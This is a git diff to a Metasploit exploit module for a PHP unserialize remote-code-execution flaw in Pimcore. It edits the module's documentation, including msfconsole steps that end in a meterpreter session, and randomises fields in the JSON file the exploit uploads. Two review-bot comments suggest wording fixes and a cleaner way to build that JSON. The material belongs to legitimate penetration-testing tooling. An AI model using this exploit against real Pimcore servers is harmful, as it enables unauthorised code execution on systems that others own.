diff --git a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md index 34ea61e352..a8755afffa 100644 --- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md +++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md 
@@ -1,29 +1,30 @@ ## Description -This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. +This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter. -Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload +Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload. -Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload +Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload. ## Vulnerable Application -Affecting Pimcore, version 5.x <= 5.6.6 and 4.x +Affecting Pimcore, version 5.x <= 5.6.6 and 4.x. ## Verification Steps -1. Setting up a working installation of Pimcore 4.x or 5.x -2. Start `msfconsole` -3. `use exploit/multi/http/pimcore_unserialize_rce` -4. `set RHOST ` -5. `set USERNAME ` -6. `set PASSWORD ` -7. `check` -8. You should see `The target service is running, but could not be validated.` -9. `exploit` -10. You should get a meterpreter session! +Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then: + +1. Start `msfconsole` +2. `use exploit/multi/http/pimcore_unserialize_rce` +3. `set RHOST ` +4. `set USERNAME ` +5. `set PASSWORD ` +6. 
`check` +7. You should see `The target service is running, but could not be validated.` +8. `exploit` +9. You should get a meterpreter session! ## Options diff --git a/modules/exploits/multi/http/pimcore_unserialize_rce.rb b/modules/exploits/multi/http/pimcore_unserialize_rce.rb index 6c14806b76..6d1e8fd85b 100644 --- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb +++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb @@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote def upload # JSON file payload - fpayload = "{\"customlayout\":[{\"creationDate\": \"1\", \"modificationDate\": \"2\", \"userOwner\": \"3\", \"userModification\": \"4\"}]}" + fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}" # construct POST data data = Rex::MIME::Message.new data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
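Review bot: the first changed line of the Description wraps unserialize() in parentheses, which reads as a typo rather than a clarification; "This module exploits a PHP unserialize() vulnerability in Pimcore before 5.7.1" (or backticks around `unserialize()`, matching the backticked commands later in the file) would be clearer. Since the hunk already rewrites this paragraph, the unchanged sentence that follows could be fixed in the same pass: "method make it possible" should read "method makes it possible" and "in "data" parameter" should read "in the "data" parameter". The collapsed version ranges agree with the removed lists (5.5.0 was never listed, so 5.5.1-5.6.6 is accurate), but the new setup sentence links only the 5.x installation documentation while the steps still cover 4.x; either add a pointer for the 4.x branch or state explicitly that the linked guide is for 5.x.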
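Review bot: the `# JSON file payload` comment above the changed line no longer describes what the line does now that the four date/owner fields are filled with rand(1..9) instead of fixed strings; the comment should state why the values are randomised, and it is worth noting in it that each field still takes one of only nine single-digit values while the field names and the `customlayout` wrapper are constant, so the document's shape is unchanged. Building the JSON by hand-escaping a Ruby string is also fragile; `{ 'customlayout' => [{ 'creationDate' => rand(1..9).to_s, 'modificationDate' => rand(1..9).to_s, 'userOwner' => rand(1..9).to_s, 'userModification' => rand(1..9).to_s }] }.to_json` (json stdlib) produces the same document without the backslash escaping and keeps the quoting correct if the fields change later.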